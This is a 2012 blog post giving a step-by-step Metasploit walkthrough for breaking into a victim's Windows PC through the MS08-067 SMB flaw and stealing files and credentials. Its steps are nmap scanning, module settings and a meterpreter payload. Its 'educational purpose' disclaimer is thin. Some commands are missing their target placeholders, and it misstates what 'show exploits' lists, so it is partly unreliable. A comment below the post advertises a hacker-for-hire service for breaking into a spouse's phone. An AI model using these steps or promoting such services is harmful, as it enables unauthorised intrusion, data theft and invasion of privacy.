Sunday, 17 June 2012

HACKING USING METASPLOIT




Here I will give a general description on how to hack a PC and steal credentials


But remember, this is only for educational purpose and hence damaging any victim’s computer is at your own risk.


Note: The hacker can be traceable and hence additional techniques are required to make yourself safe!


So here goes the requirements and the procedure to hack into a PC.








Requirements:


Metasploit (Available at metasploit.org)
Nmap (Port scanner available at nmap.org)
Debian  Linux OS (Learn more)
IP of the victim’s computer.
Introduction to attack:


Nmap is a port scanner used to scan a computer to locate the open ports. The ports are the path for the information that we need to steal. For a normal computer usually 30-40 ports are kept open.To find the number of ports open on your computer open command prompt (Start>Command prompt) and type netstat -ano and hit enter,  you will get a list of open ports in your computer. You need to have a basic knowledge on ports and port numbers to perform this attack.


Using a tool such as Metasploit we can spoof into the PC and steal the information from the corresponding port using commands. Learn to use Metasploit at http://www.metasploit.com/learn-more/how-do-i-use-it/.


We use Linux because it is the best OS for hackers. And you must know to use terminal on Linux, since we perform this attack on command lines.



Procedure:


Step 1: At first we are going to port scan the computer. For this we need to open Nmap and type the following command.


nmap -sS -O


In the place ofip> you have to write the victims ip address. If you see the ports 139 and 445 open then you can go ahead.


Step 2: Now we have to open Metasploit (via terminal) and run it.


Type the following command to get the exploits in the victim’s computer.


show exploits


You will get a list of exploits in the victim’s computer. which looks similar to ms05_039_pnp. Every such exploit correspond to different function. We are interested in an exploit which looks like this ms08_067_netapi. So we give a command as shown below.


use windows/smb/ms08_067_netapi


Step 3: Now we use RHOST command to set the target ip.


set RHOST


And RPORT command to access port 445


set RPORT 445


Step 4: And now we give a command as


set SMBPIPE SRVSVC


And then,


set TARGET 0


Step 5: Now we got to set the payload hence the following command.


set PAYLOAD windows/meterpreter/bind_tcp


Step 6: Time for the BIG BANG…! Type exploit and hit enter.


If you find the message which looks closer to “Meterpeter session 1 opened” then that implies you are done. You have successfully hacked  into the computer.


Now by using different commands we can steal the files on that system!

2 comments:

  1. Awesome thanks worked quite well.

    ReplyDelete
  2. Beware of scammers i have been scammed 3 times because i was trying to know if my husband was cheating until i met this hacker named; (wizardcyprushacker@gmail.com) who helped me hack into my spouse phone for real this great hacker hacked into my spouse whats-app messages,Facebook messages.text messages,call logs,deleted text messages,bitcoin account and many more i was impressed with his job and he brought me results under 24 hours believe me he is real and his services are cheap and affordable.

    ReplyDelete